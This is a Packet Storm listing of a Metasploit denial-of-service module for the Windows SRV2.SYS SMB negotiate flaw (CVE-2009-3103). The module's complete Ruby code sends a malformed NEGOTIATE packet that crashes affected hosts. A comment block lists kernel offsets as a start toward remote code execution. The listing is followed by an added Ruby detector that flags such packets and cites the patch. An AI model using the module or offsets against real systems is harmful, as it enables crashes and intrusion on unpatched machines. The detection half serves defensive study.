Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

Date: 31 Aug 2024 00:00:00
Reported by: H D Moore, laurent gaffie, metasploit.com
Type: packetstorm
Source: packetstormsecurity.com

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference. This Metasploit auxiliary module exploits the SMB request validation code of the SRV2.SYS driver in Windows Vista, Windows 7, and Windows 2008 Server.

Code
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
      'Description' => %q{
        This module exploits an out of bounds function table dereference in the SMB
        request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
        release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista
        without SP1 does not seem affected by this flaw.
      },
      'Author'      => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm' ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2009-3103'],
          ['BID', '36299'],
          ['OSVDB', '57799'],
          ['MSB', 'MS09-050'],
          ['URL', 'https://seclists.org/fulldisclosure/2009/Sep/39']
        ]
    ))
    register_options([
      Opt::RPORT(445),
      OptInt.new('OFFSET', [true, 'The function table offset to call', 0xffff])
    ])
  end

  def run
    connect()

    # The SMB 2 dialect must be there
    dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']
    data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')

    # Build a standard SMB1 NEGOTIATE request carrying the dialect list
    pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
    pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
    pkt['Payload']['SMB'].v['Flags2'] = 0xc853
    pkt['Payload'].v['Payload'] = data

    # ProcessIDHigh is the value SRV2.SYS uses as the function table index
    pkt['Payload']['SMB'].v['ProcessIDHigh'] = datastore['OFFSET'].to_i
    pkt['Payload']['SMB'].v['ProcessID'] = 0
    pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000)

    print_status("Sending request and waiting for a reply...")
    sock.put(pkt.to_s)
    r = sock.get_once

    if(not r)
      print_status("The target system has likely crashed")
    else
      print_status("Response received: #{r.inspect}")
    end

    disconnect()
  end
end

=begin

Gaining code execution means pointing the offset to something that
eventually causes us to run arbitrary code. The offsets below are
a starting point for turning this into remote code execution.

Offsets on Vista SP1 x64:
0x1B = "SMB 2.002"
0x1D = L"SMB2Validate"
0x1E = L"SMB2Execute"
0x31 = move eax, 0x00000002 + ret # causes a hang when reached
0x58 = WmiQueryTraceInformation
0x59 = WmiTraceMessage
0x66 = ExAllocatePoolWithTag
0x67 = ExFreePool
0x76 = ExAllocatePoolWithTag
0x77 = ExFreePool
0x86 = ExAllocatePoolWithTag
0x87 = ExFreePool
0x96 = ExAllocatePoolWithTag
0x97 = ExFreePool
0xa6 = ExAllocatePoolWithTag
0xa7 = ExFreePool
0xb9 = BugCheckEx
0xc7 = SrvBalanceCredits
0xdf = SrvNetStatistics data
0xe0 = SrvNetStatisticsLock
0x010e = SrvSnapShotScavengerThread
0x011c = SrvSnapShotScavengerTimer
0x012a = SrvScavengerThread
0x0138 = SrvScavengerTimer
0x0146 = SrvScavengeDurableHandles
0x0157 = SrvScavengeDurableHandlesTimer
0x0166 = SrvProcessOplockBreaks
0x0179 = SrvProcessOplockBreakTimer
0x0185 = L"XactSrv"
0x01f8 = WppTraceCallback


Offsets on Vista SP1 (no updates) x86:

0x64 = mov esp, ebp; pop ebp, ret
0xde = pool with tag

0 -> 99b51d6e - 8bff558bec5153568b75088b46308b98
1 -> 99b55967 - 8bff558bec51518b45088b48308b8958
2 -> 99b53e19 - 8bff558bec568b75088b4e7083791444
3 -> 99b55811 - 8bff558bec5151538b5d088b43708378
4 -> 99b53d54 - 8bff558bec56578b7d088b4770837814
5 -> 99b54d41 - 8bff558bec83ec145356578b7d088b47
6 -> 99b54c81 - 8bff558bec518b4d088b816c01000053
7 -> 99b66c44 - 8bff558bec518b4d088b816c01000053
8 -> 99b655bf - 8bff558bec518b55088b427083781471
9 -> 99b63ce4 - 8bff558bec518b4d088b816c01000053
10 -> 99b5a221 - 8bff558bec518b4d088b816c01000053
11 -> 99b62996 - 8bff558bec518b4d088b816c01000053
12 -> 99b5fab5 - 8bff558bec518b4d088b816c01000053
25 -> 819aca26 - 6a2468d0988981e8960beeff33d28955
26 -> 8186c78b - 8bff558bec83e4f86a008d451c50ff75
62 -> 80d40f20 - 0000000000eb45000000000000000000
116 -> 819273b7 - 8bff558bec83e4f883ec3c538b5d088b
117 -> 8192739f - 8bff558bec6a00ff7508e8df0a00005d
166 -> 819273b7 - 8bff558bec83e4f883ec3c538b5d088b
167 -> 8192739f - 8bff558bec6a00ff7508e8df0a00005d
194 -> 99b6b74c - 8bff558bec83ec0c0fb64d088b451c53
195 -> 99b683f0 - 943018c0c6fd3f49a3e8697224f83f6f
206 -> 99b5eeb5 - 8bff558bec83ec1ca11094b69953568b
217 -> 99b5eea0 - 6a0168809ab699ff151880b699c21000
226 -> 99b5211d - 8bff558bec83ec145356578d45f450c6
231 -> 8192fcd0 - 0000000014fd9281ffffffff04000000
237 -> 99b52108 - 6a0168009bb699ff151880b699c21000
382 -> 8b137500 - 000000009075138b0000000000000000
491 -> 8599b680 - 894518e82ee2ffff3b45087341ff7520
646 -> c000009a - 0000ffffffff80040000ffffffff8004
734 -> 802015ff - ffde03f078f8ff7f7c02f8ff3ffe01fe
760 -> 99b4ff28 - 8bff558bec6a00ff7514ff7510ff750c
804 -> 830ffc7d - 0000001722268b3e012004020010c01c


=end
```
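An added detection-side example, not part of the Metasploit module or the packetstorm listing: a Ruby parser for the NetBIOS-framed SMB1 NEGOTIATE request that flags the condition the module relies on, a non-zero ProcessIDHigh header field combined with an offered "SMB 2.002" dialect. The function names (parse_smb1_negotiate, check_negotiate, build_negotiate) are my own, and the sample packets are constructed inline from the same header values the module uses (Flags1 0x18, Flags2 0xc853, the dialect list), not captured traffic.

```ruby
# Added example: parse SMB1 NEGOTIATE requests on TCP/445 and flag the
# non-zero ProcessIDHigh condition used by the module above. Not project code.

SMB_COM_NEGOTIATE = 0x72
SMB1_MAGIC = "\xFFSMB".b
SMB1_HEADER_LEN = 32

# Parse a NetBIOS session message carrying an SMB1 NEGOTIATE request.
# Returns a Hash of header fields plus the dialect list, or nil when the
# bytes are not a well-formed request (truncated, bad magic, bad lengths).
def parse_smb1_negotiate(raw)
  raw = raw.b
  return nil if raw.bytesize < 4 + SMB1_HEADER_LEN
  nb_type, len_hi, len_lo = raw.unpack('CCn')   # NetBIOS: type(1) length(3)
  return nil unless nb_type == 0 && ((len_hi << 16) | len_lo) == raw.bytesize - 4
  smb = raw[4..-1]
  return nil unless smb[0, 4] == SMB1_MAGIC
  # SMB_Header: Protocol(4) Command(1) Status(4) Flags(1) Flags2(2) PIDHigh(2)
  #             SecurityFeatures(8) Reserved(2) TID(2) PIDLow(2) UID(2) MID(2)
  command, _status, flags1, flags2, pid_high, _sig, _rsv, tid, pid_low, uid, mid =
    smb.unpack('x4 C V C v v a8 v v v v v')
  return nil unless command == SMB_COM_NEGOTIATE
  body = smb[SMB1_HEADER_LEN..-1]
  return nil unless body.getbyte(0) == 0            # WordCount must be 0
  byte_count = body[1, 2].unpack1('v')
  buf = body[3, byte_count]
  return nil unless buf && buf.bytesize == byte_count
  dialects = []
  i = 0
  while i < buf.bytesize                            # entries: 0x02 <name> 0x00
    return nil unless buf.getbyte(i) == 0x02
    term = buf.index("\x00".b, i + 1)
    return nil unless term
    dialects << buf[(i + 1)...term]
    i = term + 1
  end
  { command: command, flags1: flags1, flags2: flags2, pid_high: pid_high,
    pid_low: pid_low, tid: tid, uid: uid, mid: mid, dialects: dialects }
end

# Detection rule: a NEGOTIATE request normally carries ProcessIDHigh == 0.
# A non-zero value is unusual on its own (low severity); combined with the
# "SMB 2.002" dialect it matches the request this module sends (high).
# Returns an alert Hash, or nil for a normal-looking request.
def check_negotiate(raw)
  req = parse_smb1_negotiate(raw)
  return nil unless req
  return nil if req[:pid_high].zero?
  offers_smb2 = req[:dialects].include?('SMB 2.002')
  {
    severity: offers_smb2 ? :high : :low,
    reason: format('SMB1 NEGOTIATE with non-zero ProcessIDHigh 0x%04x%s',
                   req[:pid_high], offers_smb2 ? ' and "SMB 2.002" dialect offered' : ''),
    dialects: req[:dialects]
  }
end

# Constructed sample input (not captured traffic): a NetBIOS-framed SMB1
# NEGOTIATE request with the given ProcessIDHigh and dialect list.
def build_negotiate(pid_high, dialects)
  data = dialects.map { |d| "\x02".b + d.b + "\x00".b }.join
  header = [SMB1_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xc853, pid_high,
            "\x00" * 8, 0, 0, 0, 0, 0x1234].pack('a4 C V C v v a8 v v v v v')
  smb = header + [0, data.bytesize].pack('C v') + data
  [0, smb.bytesize >> 16, smb.bytesize & 0xffff].pack('C C n') + smb
end

DIALECTS = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'NT LM 0.12', 'SMB 2.002'].freeze

if __FILE__ == $0
  [[0, DIALECTS], [0xffff, DIALECTS], [0x31, DIALECTS - ['SMB 2.002']]].each do |pid_high, dl|
    alert = check_negotiate(build_negotiate(pid_high, dl))
    puts alert ? "ALERT (#{alert[:severity]}): #{alert[:reason]}" : 'ok: normal negotiate'
  end
end
```

The parser rejects anything that is not a structurally valid NEGOTIATE before looking at ProcessIDHigh, so malformed or truncated segments produce no alert rather than a false one. Keep the NetBIOS length check; without it a long-lived session that batches several messages into one segment would be mis-parsed. The detection is a signal for triage only; the fix for affected hosts is the MS09-050 update referenced in the module.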
